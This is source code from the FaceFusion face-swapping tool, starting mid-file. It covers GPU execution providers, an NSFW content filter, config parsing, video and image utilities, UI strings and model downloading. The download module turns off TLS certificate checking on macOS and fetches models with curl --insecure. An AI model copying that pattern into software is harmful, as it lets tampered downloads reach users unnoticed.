categorize_gender(face.gender) == gender: filter_faces.append(face) return filter_faces File: facefusion/execution.py from typing import List, 
Any from functools import lru_cache import subprocess import xml.etree.ElementTree as ElementTree import onnxruntime from facefusion.typing import ExecutionDevice, ValueAndUnit def encode_execution_providers(execution_providers : List[str]) -> List[str]: return [ execution_provider.replace('ExecutionProvider', '').lower() for execution_provider in execution_providers ] def decode_execution_providers(execution_providers : List[str]) -> List[str]: available_execution_providers = onnxruntime.get_available_providers() encoded_execution_providers = encode_execution_providers(available_execution_providers) return [ execution_provider for execution_provider, encoded_execution_provider in zip(available_execution_providers, encoded_execution_providers) if any(execution_provider in encoded_execution_provider for execution_provider in execution_providers) ] def has_execution_provider(execution_provider : str) -> bool: return execution_provider in onnxruntime.get_available_providers() def apply_execution_provider_options(execution_device_id : str, execution_providers : List[str]) -> List[Any]: execution_providers_with_options : List[Any] = [] for execution_provider in execution_providers: if execution_provider == 'CUDAExecutionProvider': execution_providers_with_options.append((execution_provider, { 'device_id': execution_device_id, 'cudnn_conv_algo_search': 'EXHAUSTIVE' if use_exhaustive() else 'DEFAULT' })) elif execution_provider == 'OpenVINOExecutionProvider': execution_providers_with_options.append((execution_provider, { 'device_id': execution_device_id, 'device_type': execution_device_id + '_FP32' })) elif execution_provider in [ 'DmlExecutionProvider', 'ROCMExecutionProvider' ]: execution_providers_with_options.append((execution_provider, { 'device_id': execution_device_id })) else: execution_providers_with_options.append(execution_provider) return execution_providers_with_options def use_exhaustive() -> bool: execution_devices = detect_static_execution_devices() product_names = ('GeForce GTX 1630', 'GeForce GTX 1650', 'GeForce GTX 1660') return any(execution_device.get('product').get('name').startswith(product_names) for execution_device in execution_devices) def run_nvidia_smi() -> subprocess.Popen[bytes]: commands = [ 'nvidia-smi', '--query', '--xml-format' ] return subprocess.Popen(commands, stdout = subprocess.PIPE) @lru_cache(maxsize = None) def detect_static_execution_devices() -> List[ExecutionDevice]: return detect_execution_devices() def detect_execution_devices() -> List[ExecutionDevice]: execution_devices : List[ExecutionDevice] = [] try: output, _ = run_nvidia_smi().communicate() root_element = ElementTree.fromstring(output) except Exception: root_element = ElementTree.Element('xml') for gpu_element in root_element.findall('gpu'): execution_devices.append( { 'driver_version': root_element.find('driver_version').text, 'framework': { 'name': 'CUDA', 'version': root_element.find('cuda_version').text }, 'product': { 'vendor': 'NVIDIA', 'name': gpu_element.find('product_name').text.replace('NVIDIA ', '') }, 'video_memory': { 'total': create_value_and_unit(gpu_element.find('fb_memory_usage/total').text), 'free': create_value_and_unit(gpu_element.find('fb_memory_usage/free').text) }, 'utilization': { 'gpu': create_value_and_unit(gpu_element.find('utilization/gpu_util').text), 'memory': create_value_and_unit(gpu_element.find('utilization/memory_util').text) } }) return execution_devices def create_value_and_unit(text : str) -> ValueAndUnit: value, unit = text.split() value_and_unit : 
ValueAndUnit =\ { 'value': value, 'unit': unit } return value_and_unit File: facefusion/content_analyser.py from typing import Any from functools import lru_cache from time import sleep import cv2 import numpy import onnxruntime from tqdm import tqdm import facefusion.globals from facefusion import process_manager, wording from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import VisionFrame, ModelSet, Fps from facefusion.execution import apply_execution_provider_options from facefusion.vision import get_video_frame, count_video_frame_total, read_image, detect_video_fps from facefusion.filesystem import resolve_relative_path, is_file from facefusion.download import conditional_download CONTENT_ANALYSER = None MODELS : ModelSet =\ { 'open_nsfw': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/open_nsfw.onnx', 'path': resolve_relative_path('../.assets/models/open_nsfw.onnx') } } PROBABILITY_LIMIT = 0.80 RATE_LIMIT = 10 STREAM_COUNTER = 0 def get_content_analyser() -> Any: global CONTENT_ANALYSER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if CONTENT_ANALYSER is None: model_path = MODELS.get('open_nsfw').get('path') CONTENT_ANALYSER = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return CONTENT_ANALYSER def clear_content_analyser() -> None: global CONTENT_ANALYSER CONTENT_ANALYSER = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = MODELS.get('open_nsfw').get('url') model_path = MODELS.get('open_nsfw').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def analyse_stream(vision_frame : VisionFrame, video_fps : Fps) -> bool: global STREAM_COUNTER STREAM_COUNTER = STREAM_COUNTER + 1 if STREAM_COUNTER % int(video_fps) == 0: return analyse_frame(vision_frame) return False def analyse_frame(vision_frame : VisionFrame) -> bool: content_analyser = get_content_analyser() vision_frame = prepare_frame(vision_frame) with conditional_thread_semaphore(facefusion.globals.execution_providers): probability = content_analyser.run(None, { content_analyser.get_inputs()[0].name: vision_frame })[0][0][1] return probability > PROBABILITY_LIMIT def prepare_frame(vision_frame : VisionFrame) -> VisionFrame: vision_frame = cv2.resize(vision_frame, (224, 224)).astype(numpy.float32) vision_frame -= numpy.array([ 104, 117, 123 ]).astype(numpy.float32) vision_frame = numpy.expand_dims(vision_frame, axis = 0) return vision_frame @lru_cache(maxsize = None) def analyse_image(image_path : str) -> bool: frame = read_image(image_path) return analyse_frame(frame) @lru_cache(maxsize = None) def analyse_video(video_path : str, start_frame : int, end_frame : int) -> bool: video_frame_total = count_video_frame_total(video_path) video_fps = detect_video_fps(video_path) frame_range = range(start_frame or 0, end_frame or video_frame_total) rate = 0.0 counter = 0 with tqdm(total = len(frame_range), desc = wording.get('analysing'), unit = 'frame', ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: for frame_number in frame_range: if frame_number % int(video_fps) == 0: frame = get_video_frame(video_path, frame_number) if analyse_frame(frame): counter += 1 rate = counter * 
int(video_fps) / len(frame_range) * 100 progress.update() progress.set_postfix(rate = rate) return rate > RATE_LIMIT File: facefusion/config.py from configparser import ConfigParser from typing import Any, Optional, List import facefusion.globals CONFIG = None def get_config() -> ConfigParser: global CONFIG if CONFIG is None: CONFIG = ConfigParser() CONFIG.read(facefusion.globals.config_path, encoding = 'utf-8') return CONFIG def clear_config() -> None: global CONFIG CONFIG = None def get_str_value(key : str, fallback : Optional[str] = None) -> Optional[str]: value = get_value_by_notation(key) if value or fallback: return str(value or fallback) return None def get_int_value(key : str, fallback : Optional[str] = None) -> Optional[int]: value = get_value_by_notation(key) if value or fallback: return int(value or fallback) return None def get_float_value(key : str, fallback : Optional[str] = None) -> Optional[float]: value = get_value_by_notation(key) if value or fallback: return float(value or fallback) return None def get_bool_value(key : str, fallback : Optional[str] = None) -> Optional[bool]: value = get_value_by_notation(key) if value == 'True' or fallback == 'True': return True if value == 'False' or fallback == 'False': return False return None def get_str_list(key : str, fallback : Optional[str] = None) -> Optional[List[str]]: value = get_value_by_notation(key) if value or fallback: return [ str(value) for value in (value or fallback).split(' ') ] return None def get_int_list(key : str, fallback : Optional[str] = None) -> Optional[List[int]]: value = get_value_by_notation(key) if value or fallback: return [ int(value) for value in (value or fallback).split(' ') ] return None def get_float_list(key : str, fallback : Optional[str] = None) -> Optional[List[float]]: value = get_value_by_notation(key) if value or fallback: return [ float(value) for value in (value or fallback).split(' ') ] return None def get_value_by_notation(key : str) -> Optional[Any]: config = get_config() if '.' 
in key: section, name = key.split('.') if section in config and name in config[section]: return config[section][name] if key in config: return config[key] return None File: facefusion/metadata.py METADATA =\ { 'name': 'FaceFusion', 'description': 'Next generation face swapper and enhancer', 'version': '2.6.1', 'license': 'MIT', 'author': 'Henry Ruhs', 'url': 'https://facefusion.io' } def get(key : str) -> str: return METADATA[key] File: facefusion/vision.py from typing import Optional, List, Tuple from functools import lru_cache import cv2 import numpy from cv2.typing import Size from facefusion.common_helper import is_windows from facefusion.typing import VisionFrame, Resolution, Fps from facefusion.choices import image_template_sizes, video_template_sizes from facefusion.filesystem import is_image, is_video, sanitize_path_for_windows @lru_cache(maxsize = 128) def read_static_image(image_path : str) -> Optional[VisionFrame]: return read_image(image_path) def read_static_images(image_paths : List[str]) -> Optional[List[VisionFrame]]: frames = [] if image_paths: for image_path in image_paths: frames.append(read_static_image(image_path)) return frames def read_image(image_path : str) -> Optional[VisionFrame]: if is_image(image_path): if is_windows(): image_path = sanitize_path_for_windows(image_path) return cv2.imread(image_path) return None def write_image(image_path : str, vision_frame : VisionFrame) -> bool: if image_path: if is_windows(): image_path = sanitize_path_for_windows(image_path) return cv2.imwrite(image_path, vision_frame) return False def detect_image_resolution(image_path : str) -> Optional[Resolution]: if is_image(image_path): image = read_image(image_path) height, width = image.shape[:2] return width, height return None def restrict_image_resolution(image_path : str, resolution : Resolution) -> Resolution: if is_image(image_path): image_resolution = detect_image_resolution(image_path) if image_resolution < resolution: return image_resolution return resolution def create_image_resolutions(resolution : Resolution) -> List[str]: resolutions = [] temp_resolutions = [] if resolution: width, height = resolution temp_resolutions.append(normalize_resolution(resolution)) for template_size in image_template_sizes: temp_resolutions.append(normalize_resolution((width * template_size, height * template_size))) temp_resolutions = sorted(set(temp_resolutions)) for temp_resolution in temp_resolutions: resolutions.append(pack_resolution(temp_resolution)) return resolutions def get_video_frame(video_path : str, frame_number : int = 0) -> Optional[VisionFrame]: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture = cv2.VideoCapture(video_path) if video_capture.isOpened(): frame_total = video_capture.get(cv2.CAP_PROP_FRAME_COUNT) video_capture.set(cv2.CAP_PROP_POS_FRAMES, min(frame_total, frame_number - 1)) has_vision_frame, vision_frame = video_capture.read() video_capture.release() if has_vision_frame: return vision_frame return None def count_video_frame_total(video_path : str) -> int: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture = cv2.VideoCapture(video_path) if video_capture.isOpened(): video_frame_total = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT)) video_capture.release() return video_frame_total return 0 def detect_video_fps(video_path : str) -> Optional[float]: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture 
= cv2.VideoCapture(video_path) if video_capture.isOpened(): video_fps = video_capture.get(cv2.CAP_PROP_FPS) video_capture.release() return video_fps return None def restrict_video_fps(video_path : str, fps : Fps) -> Fps: if is_video(video_path): video_fps = detect_video_fps(video_path) if video_fps < fps: return video_fps return fps def detect_video_resolution(video_path : str) -> Optional[Resolution]: if is_video(video_path): if is_windows(): video_path = sanitize_path_for_windows(video_path) video_capture = cv2.VideoCapture(video_path) if video_capture.isOpened(): width = video_capture.get(cv2.CAP_PROP_FRAME_WIDTH) height = video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT) video_capture.release() return int(width), int(height) return None def restrict_video_resolution(video_path : str, resolution : Resolution) -> Resolution: if is_video(video_path): video_resolution = detect_video_resolution(video_path) if video_resolution < resolution: return video_resolution return resolution def create_video_resolutions(resolution : Resolution) -> List[str]: resolutions = [] temp_resolutions = [] if resolution: width, height = resolution temp_resolutions.append(normalize_resolution(resolution)) for template_size in video_template_sizes: if width > height: temp_resolutions.append(normalize_resolution((template_size * width / height, template_size))) else: temp_resolutions.append(normalize_resolution((template_size, template_size * height / width))) temp_resolutions = sorted(set(temp_resolutions)) for temp_resolution in temp_resolutions: resolutions.append(pack_resolution(temp_resolution)) return resolutions def normalize_resolution(resolution : Tuple[float, float]) -> Resolution: width, height = resolution if width and height: normalize_width = round(width / 2) * 2 normalize_height = round(height / 2) * 2 return normalize_width, normalize_height return 0, 0 def pack_resolution(resolution : Resolution) -> str: width, height = normalize_resolution(resolution) return str(width) + 'x' + str(height) def unpack_resolution(resolution : str) -> Resolution: width, height = map(int, resolution.split('x')) return width, height def resize_frame_resolution(vision_frame : VisionFrame, max_resolution : Resolution) -> VisionFrame: height, width = vision_frame.shape[:2] max_width, max_height = max_resolution if height > max_height or width > max_width: scale = min(max_height / height, max_width / width) new_width = int(width * scale) new_height = int(height * scale) return cv2.resize(vision_frame, (new_width, new_height)) return vision_frame def normalize_frame_color(vision_frame : VisionFrame) -> VisionFrame: return cv2.cvtColor(vision_frame, cv2.COLOR_BGR2RGB) def create_tile_frames(vision_frame : VisionFrame, size : Size) -> Tuple[List[VisionFrame], int, int]: vision_frame = numpy.pad(vision_frame, ((size[1], size[1]), (size[1], size[1]), (0, 0))) tile_width = size[0] - 2 * size[2] pad_size_bottom = size[2] + tile_width - vision_frame.shape[0] % tile_width pad_size_right = size[2] + tile_width - vision_frame.shape[1] % tile_width pad_vision_frame = numpy.pad(vision_frame, ((size[2], pad_size_bottom), (size[2], pad_size_right), (0, 0))) pad_height, pad_width = pad_vision_frame.shape[:2] row_range = range(size[2], pad_height - size[2], tile_width) col_range = range(size[2], pad_width - size[2], tile_width) tile_vision_frames = [] for row_vision_frame in row_range: top = row_vision_frame - size[2] bottom = row_vision_frame + size[2] + tile_width for column_vision_frame in col_range: left = column_vision_frame - size[2] 
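# each tile is size[0] pixels square: the row/column grid steps by tile_width = size[0] - 2 * size[2],
# so adjacent tiles overlap by 2 * size[2] pixels and merge_tile_frames crops size[2] from every edge
# before stitching (for example, size = (256, 16, 8) would step the grid by 240 pixels)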
right = column_vision_frame + size[2] + tile_width tile_vision_frames.append(pad_vision_frame[top:bottom, left:right, :]) return tile_vision_frames, pad_width, pad_height def merge_tile_frames(tile_vision_frames : List[VisionFrame], temp_width : int, temp_height : int, pad_width : int, pad_height : int, size : Size) -> VisionFrame: merge_vision_frame = numpy.zeros((pad_height, pad_width, 3)).astype(numpy.uint8) tile_width = tile_vision_frames[0].shape[1] - 2 * size[2] tiles_per_row = min(pad_width // tile_width, len(tile_vision_frames)) for index, tile_vision_frame in enumerate(tile_vision_frames): tile_vision_frame = tile_vision_frame[size[2]:-size[2], size[2]:-size[2]] row_index = index // tiles_per_row col_index = index % tiles_per_row top = row_index * tile_vision_frame.shape[0] bottom = top + tile_vision_frame.shape[0] left = col_index * tile_vision_frame.shape[1] right = left + tile_vision_frame.shape[1] merge_vision_frame[top:bottom, left:right, :] = tile_vision_frame merge_vision_frame = merge_vision_frame[size[1] : size[1] + temp_height, size[1]: size[1] + temp_width, :] return merge_vision_frame File: facefusion/memory.py from facefusion.common_helper import is_macos, is_windows if is_windows(): import ctypes else: import resource def limit_system_memory(system_memory_limit : int = 1) -> bool: if is_macos(): system_memory_limit = system_memory_limit * (1024 ** 6) else: system_memory_limit = system_memory_limit * (1024 ** 3) try: if is_windows(): ctypes.windll.kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(system_memory_limit), ctypes.c_size_t(system_memory_limit)) #type:ignore[attr-defined] else: resource.setrlimit(resource.RLIMIT_DATA, (system_memory_limit, system_memory_limit)) return True except Exception: return False File: facefusion/wording.py from typing import Any, Dict, Optional WORDING : Dict[str, Any] =\ { 'conda_not_activated': 'Conda is not activated', 'python_not_supported': 'Python version is not supported, upgrade to {version} or higher', 'ffmpeg_not_installed': 'FFMpeg is not installed', 'creating_temp': 'Creating temporary resources', 'extracting_frames': 'Extracting frames with a resolution of {resolution} and {fps} frames per second', 'extracting_frames_succeed': 'Extracting frames succeed', 'extracting_frames_failed': 'Extracting frames failed', 'analysing': 'Analysing', 'processing': 'Processing', 'downloading': 'Downloading', 'temp_frames_not_found': 'Temporary frames not found', 'copying_image': 'Copying image with a resolution of {resolution}', 'copying_image_succeed': 'Copying image succeed', 'copying_image_failed': 'Copying image failed', 'finalizing_image': 'Finalizing image with a resolution of {resolution}', 'finalizing_image_succeed': 'Finalizing image succeed', 'finalizing_image_skipped': 'Finalizing image skipped', 'merging_video': 'Merging video with a resolution of {resolution} and {fps} frames per second', 'merging_video_succeed': 'Merging video succeed', 'merging_video_failed': 'Merging video failed', 'skipping_audio': 'Skipping audio', 'restoring_audio_succeed': 'Restoring audio succeed', 'restoring_audio_skipped': 'Restoring audio skipped', 'clearing_temp': 'Clearing temporary resources', 'processing_stopped': 'Processing stopped', 'processing_image_succeed': 'Processing to image succeed in {seconds} seconds', 'processing_image_failed': 'Processing to image failed', 'processing_video_succeed': 'Processing to video succeed in {seconds} seconds', 'processing_video_failed': 'Processing to video failed', 'model_download_not_done': 
'Download of the model is not done', 'model_file_not_present': 'File of the model is not present', 'select_image_source': 'Select a image for source path', 'select_audio_source': 'Select a audio for source path', 'select_video_target': 'Select a video for target path', 'select_image_or_video_target': 'Select a image or video for target path', 'select_file_or_directory_output': 'Select a file or directory for output path', 'no_source_face_detected': 'No source face detected', 'frame_processor_not_loaded': 'Frame processor {frame_processor} could not be loaded', 'frame_processor_not_implemented': 'Frame processor {frame_processor} not implemented correctly', 'ui_layout_not_loaded': 'UI layout {ui_layout} could not be loaded', 'ui_layout_not_implemented': 'UI layout {ui_layout} not implemented correctly', 'stream_not_loaded': 'Stream {stream_mode} could not be loaded', 'point': '.', 'comma': ',', 'colon': ':', 'question_mark': '?', 'exclamation_mark': '!', 'help': { # installer 'install_dependency': 'select the variant of {dependency} to install', 'skip_conda': 'skip the conda environment check', # general 'config': 'choose the config file to override defaults', 'source': 'choose single or multiple source images or audios', 'target': 'choose single target image or video', 'output': 'specify the output file or directory', # misc 'force_download': 'force automate downloads and exit', 'skip_download': 'omit automate downloads and remote lookups', 'headless': 'run the program without a user interface', 'log_level': 'adjust the message severity displayed in the terminal', # execution 'execution_device_id': 'specify the device used for processing', 'execution_providers': 'accelerate the model inference using different providers (choices: {choices}, ...)', 'execution_thread_count': 'specify the amount of parallel threads while processing', 'execution_queue_count': 'specify the amount of frames each thread is processing', # memory 'video_memory_strategy': 'balance fast frame processing and low VRAM usage', 'system_memory_limit': 'limit the available RAM that can be used while processing', # face analyser 'face_analyser_order': 'specify the order in which the face analyser detects faces', 'face_analyser_age': 'filter the detected faces based on their age', 'face_analyser_gender': 'filter the detected faces based on their gender', 'face_detector_model': 'choose the model responsible for detecting the face', 'face_detector_size': 'specify the size of the frame provided to the face detector', 'face_detector_score': 'filter the detected faces base on the confidence score', 'face_landmarker_score': 'filter the detected landmarks base on the confidence score', # face selector 'face_selector_mode': 'use reference based tracking or simple matching', 'reference_face_position': 'specify the position used to create the reference face', 'reference_face_distance': 'specify the desired similarity between the reference face and target face', 'reference_frame_number': 'specify the frame used to create the reference face', # face mask 'face_mask_types': 'mix and match different face mask types (choices: {choices})', 'face_mask_blur': 'specify the degree of blur applied the box mask', 'face_mask_padding': 'apply top, right, bottom and left padding to the box mask', 'face_mask_regions': 'choose the facial features used for the region mask (choices: {choices})', # frame extraction 'trim_frame_start': 'specify the the start frame of the target video', 'trim_frame_end': 'specify the the end frame of the target video', 
'temp_frame_format': 'specify the temporary resources format', 'keep_temp': 'keep the temporary resources after processing', # output creation 'output_image_quality': 'specify the image quality which translates to the compression factor', 'output_image_resolution': 'specify the image output resolution based on the target image', 'output_video_encoder': 'specify the encoder use for the video compression', 'output_video_preset': 'balance fast video processing and video file size', 'output_video_quality': 'specify the video quality which translates to the compression factor', 'output_video_resolution': 'specify the video output resolution based on the target video', 'output_video_fps': 'specify the video output fps based on the target video', 'skip_audio': 'omit the audio from the target video', # frame processors 'frame_processors': 'load a single or multiple frame processors. (choices: {choices}, ...)', 'face_debugger_items': 'load a single or multiple frame processors (choices: {choices})', 'face_enhancer_model': 'choose the model responsible for enhancing the face', 'face_enhancer_blend': 'blend the enhanced into the previous face', 'face_swapper_model': 'choose the model responsible for swapping the face', 'frame_colorizer_model': 'choose the model responsible for colorizing the frame', 'frame_colorizer_blend': 'blend the colorized into the previous frame', 'frame_colorizer_size': 'specify the size of the frame provided to the frame colorizer', 'frame_enhancer_model': 'choose the model responsible for enhancing the frame', 'frame_enhancer_blend': 'blend the enhanced into the previous frame', 'lip_syncer_model': 'choose the model responsible for syncing the lips', # uis 'open_browser': 'open the browser once the program is ready', 'ui_layouts': 'launch a single or multiple UI layouts (choices: {choices}, ...)' }, 'uis': { # general 'start_button': 'START', 'stop_button': 'STOP', 'clear_button': 'CLEAR', # about 'donate_button': 'DONATE', # benchmark 'benchmark_results_dataframe': 'BENCHMARK RESULTS', # benchmark options 'benchmark_runs_checkbox_group': 'BENCHMARK RUNS', 'benchmark_cycles_slider': 'BENCHMARK CYCLES', # common options 'common_options_checkbox_group': 'OPTIONS', # execution 'execution_providers_checkbox_group': 'EXECUTION PROVIDERS', # execution queue count 'execution_queue_count_slider': 'EXECUTION QUEUE COUNT', # execution thread count 'execution_thread_count_slider': 'EXECUTION THREAD COUNT', # face analyser 'face_analyser_order_dropdown': 'FACE ANALYSER ORDER', 'face_analyser_age_dropdown': 'FACE ANALYSER AGE', 'face_analyser_gender_dropdown': 'FACE ANALYSER GENDER', 'face_detector_model_dropdown': 'FACE DETECTOR MODEL', 'face_detector_size_dropdown': 'FACE DETECTOR SIZE', 'face_detector_score_slider': 'FACE DETECTOR SCORE', 'face_landmarker_score_slider': 'FACE LANDMARKER SCORE', # face masker 'face_mask_types_checkbox_group': 'FACE MASK TYPES', 'face_mask_blur_slider': 'FACE MASK BLUR', 'face_mask_padding_top_slider': 'FACE MASK PADDING TOP', 'face_mask_padding_right_slider': 'FACE MASK PADDING RIGHT', 'face_mask_padding_bottom_slider': 'FACE MASK PADDING BOTTOM', 'face_mask_padding_left_slider': 'FACE MASK PADDING LEFT', 'face_mask_region_checkbox_group': 'FACE MASK REGIONS', # face selector 'face_selector_mode_dropdown': 'FACE SELECTOR MODE', 'reference_face_gallery': 'REFERENCE FACE', 'reference_face_distance_slider': 'REFERENCE FACE DISTANCE', # frame processors 'frame_processors_checkbox_group': 'FRAME PROCESSORS', # frame processors options 
'face_debugger_items_checkbox_group': 'FACE DEBUGGER ITEMS', 'face_enhancer_model_dropdown': 'FACE ENHANCER MODEL', 'face_enhancer_blend_slider': 'FACE ENHANCER BLEND', 'face_swapper_model_dropdown': 'FACE SWAPPER MODEL', 'frame_colorizer_model_dropdown': 'FRAME COLORIZER MODEL', 'frame_colorizer_blend_slider': 'FRAME COLORIZER BLEND', 'frame_colorizer_size_dropdown': 'FRAME COLORIZER SIZE', 'frame_enhancer_model_dropdown': 'FRAME ENHANCER MODEL', 'frame_enhancer_blend_slider': 'FRAME ENHANCER BLEND', 'lip_syncer_model_dropdown': 'LIP SYNCER MODEL', # memory 'video_memory_strategy_dropdown': 'VIDEO MEMORY STRATEGY', 'system_memory_limit_slider': 'SYSTEM MEMORY LIMIT', # output 'output_image_or_video': 'OUTPUT', # output options 'output_path_textbox': 'OUTPUT PATH', 'output_image_quality_slider': 'OUTPUT IMAGE QUALITY', 'output_image_resolution_dropdown': 'OUTPUT IMAGE RESOLUTION', 'output_video_encoder_dropdown': 'OUTPUT VIDEO ENCODER', 'output_video_preset_dropdown': 'OUTPUT VIDEO PRESET', 'output_video_quality_slider': 'OUTPUT VIDEO QUALITY', 'output_video_resolution_dropdown': 'OUTPUT VIDEO RESOLUTION', 'output_video_fps_slider': 'OUTPUT VIDEO FPS', # preview 'preview_image': 'PREVIEW', 'preview_frame_slider': 'PREVIEW FRAME', # source 'source_file': 'SOURCE', # target 'target_file': 'TARGET', # temp frame 'temp_frame_format_dropdown': 'TEMP FRAME FORMAT', # trim frame 'trim_frame_start_slider': 'TRIM FRAME START', 'trim_frame_end_slider': 'TRIM FRAME END', # webcam 'webcam_image': 'WEBCAM', # webcam options 'webcam_mode_radio': 'WEBCAM MODE', 'webcam_resolution_dropdown': 'WEBCAM RESOLUTION', 'webcam_fps_slider': 'WEBCAM FPS' } } def get(key : str) -> Optional[str]: if '.' in key: section, name = key.split('.') if section in WORDING and name in WORDING[section]: return WORDING[section][name] if key in WORDING: return WORDING[key] return None File: facefusion/globals.py from typing import List, Optional from facefusion.typing import LogLevel, VideoMemoryStrategy, FaceSelectorMode, FaceAnalyserOrder, FaceAnalyserAge, FaceAnalyserGender, FaceMaskType, FaceMaskRegion, OutputVideoEncoder, OutputVideoPreset, FaceDetectorModel, FaceRecognizerModel, TempFrameFormat, Padding # general config_path : Optional[str] = None source_paths : Optional[List[str]] = None target_path : Optional[str] = None output_path : Optional[str] = None # misc force_download : Optional[bool] = None skip_download : Optional[bool] = None headless : Optional[bool] = None log_level : Optional[LogLevel] = None # execution execution_device_id : Optional[str] = None execution_providers : List[str] = [] execution_thread_count : Optional[int] = None execution_queue_count : Optional[int] = None # memory video_memory_strategy : Optional[VideoMemoryStrategy] = None system_memory_limit : Optional[int] = None # face analyser face_analyser_order : Optional[FaceAnalyserOrder] = None face_analyser_age : Optional[FaceAnalyserAge] = None face_analyser_gender : Optional[FaceAnalyserGender] = None face_detector_model : Optional[FaceDetectorModel] = None face_detector_size : Optional[str] = None face_detector_score : Optional[float] = None face_landmarker_score : Optional[float] = None face_recognizer_model : Optional[FaceRecognizerModel] = None # face selector face_selector_mode : Optional[FaceSelectorMode] = None reference_face_position : Optional[int] = None reference_face_distance : Optional[float] = None reference_frame_number : Optional[int] = None # face mask face_mask_types : Optional[List[FaceMaskType]] = None face_mask_blur : 
Optional[float] = None face_mask_padding : Optional[Padding] = None face_mask_regions : Optional[List[FaceMaskRegion]] = None # frame extraction trim_frame_start : Optional[int] = None trim_frame_end : Optional[int] = None temp_frame_format : Optional[TempFrameFormat] = None keep_temp : Optional[bool] = None # output creation output_image_quality : Optional[int] = None output_image_resolution : Optional[str] = None output_video_encoder : Optional[OutputVideoEncoder] = None output_video_preset : Optional[OutputVideoPreset] = None output_video_quality : Optional[int] = None output_video_resolution : Optional[str] = None output_video_fps : Optional[float] = None skip_audio : Optional[bool] = None # frame processors frame_processors : List[str] = [] # uis open_browser : Optional[bool] = None ui_layouts : List[str] = [] File: facefusion/download.py import os import subprocess import ssl import urllib.request from typing import List from functools import lru_cache from tqdm import tqdm import facefusion.globals from facefusion import wording from facefusion.common_helper import is_macos from facefusion.filesystem import get_file_size, is_file if is_macos(): ssl._create_default_https_context = ssl._create_unverified_context def conditional_download(download_directory_path : str, urls : List[str]) -> None: for url in urls: download_file_path = os.path.join(download_directory_path, os.path.basename(url)) initial_size = get_file_size(download_file_path) download_size = get_download_size(url) if initial_size < download_size: with tqdm(total = download_size, initial = initial_size, desc = wording.get('downloading'), unit = 'B', unit_scale = True, unit_divisor = 1024, ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: subprocess.Popen([ 'curl', '--create-dirs', '--silent', '--insecure', '--location', '--continue-at', '-', '--output', download_file_path, url ]) current_size = initial_size while current_size < download_size: if is_file(download_file_path): current_size = get_file_size(download_file_path) progress.update(current_size - progress.n) if download_size and not is_download_done(url, download_file_path): os.remove(download_file_path) conditional_download(download_directory_path, [ url ]) @lru_cache(maxsize = None) def get_download_size(url : str) -> int: try: response = urllib.request.urlopen(url, timeout = 10) return int(response.getheader('Content-Length')) except (OSError, ValueError): return 0 def is_download_done(url : str, file_path : str) -> bool: if is_file(file_path): return get_download_size(url) == get_file_size(file_path) return False File: facefusion/filesystem.py from typing import List, Optional import glob import os import shutil import tempfile import filetype from pathlib import Path import facefusion.globals from facefusion.common_helper import is_windows if is_windows(): import ctypes def get_temp_frame_paths(target_path : str) -> List[str]: temp_frames_pattern = get_temp_frames_pattern(target_path, '*') return sorted(glob.glob(temp_frames_pattern)) def get_temp_frames_pattern(target_path : str, temp_frame_prefix : str) -> str: temp_directory_path = get_temp_directory_path(target_path) return os.path.join(temp_directory_path, temp_frame_prefix + '.' 
+ facefusion.globals.temp_frame_format) def get_temp_file_path(target_path : str) -> str: _, target_extension = os.path.splitext(os.path.basename(target_path)) temp_directory_path = get_temp_directory_path(target_path) return os.path.join(temp_directory_path, 'temp' + target_extension) def get_temp_directory_path(target_path : str) -> str: target_name, _ = os.path.splitext(os.path.basename(target_path)) temp_directory_path = os.path.join(tempfile.gettempdir(), 'facefusion') return os.path.join(temp_directory_path, target_name) def create_temp(target_path : str) -> None: temp_directory_path = get_temp_directory_path(target_path) Path(temp_directory_path).mkdir(parents = True, exist_ok = True) def move_temp(target_path : str, output_path : str) -> None: temp_file_path = get_temp_file_path(target_path) if is_file(temp_file_path): if is_file(output_path): os.remove(output_path) shutil.move(temp_file_path, output_path) def clear_temp(target_path : str) -> None: temp_directory_path = get_temp_directory_path(target_path) parent_directory_path = os.path.dirname(temp_directory_path) if not facefusion.globals.keep_temp and is_directory(temp_directory_path): shutil.rmtree(temp_directory_path, ignore_errors = True) if os.path.exists(parent_directory_path) and not os.listdir(parent_directory_path): os.rmdir(parent_directory_path) def get_file_size(file_path : str) -> int: if is_file(file_path): return os.path.getsize(file_path) return 0 def is_file(file_path : str) -> bool: return bool(file_path and os.path.isfile(file_path)) def is_directory(directory_path : str) -> bool: return bool(directory_path and os.path.isdir(directory_path)) def is_audio(audio_path : str) -> bool: return is_file(audio_path) and filetype.helpers.is_audio(audio_path) def has_audio(audio_paths : List[str]) -> bool: if audio_paths: return any(is_audio(audio_path) for audio_path in audio_paths) return False def is_image(image_path : str) -> bool: return is_file(image_path) and filetype.helpers.is_image(image_path) def has_image(image_paths: List[str]) -> bool: if image_paths: return any(is_image(image_path) for image_path in image_paths) return False def is_video(video_path : str) -> bool: return is_file(video_path) and filetype.helpers.is_video(video_path) def filter_audio_paths(paths : List[str]) -> List[str]: if paths: return [ path for path in paths if is_audio(path) ] return [] def filter_image_paths(paths : List[str]) -> List[str]: if paths: return [ path for path in paths if is_image(path) ] return [] def resolve_relative_path(path : str) -> str: return os.path.abspath(os.path.join(os.path.dirname(__file__), path)) def list_directory(directory_path : str) -> Optional[List[str]]: if is_directory(directory_path): files = os.listdir(directory_path) files = [ Path(file).stem for file in files if not Path(file).stem.startswith(('.', '__')) ] return sorted(files) return None def sanitize_path_for_windows(full_path : str) -> Optional[str]: buffer_size = 0 while True: unicode_buffer = ctypes.create_unicode_buffer(buffer_size) buffer_threshold = ctypes.windll.kernel32.GetShortPathNameW(full_path, unicode_buffer, 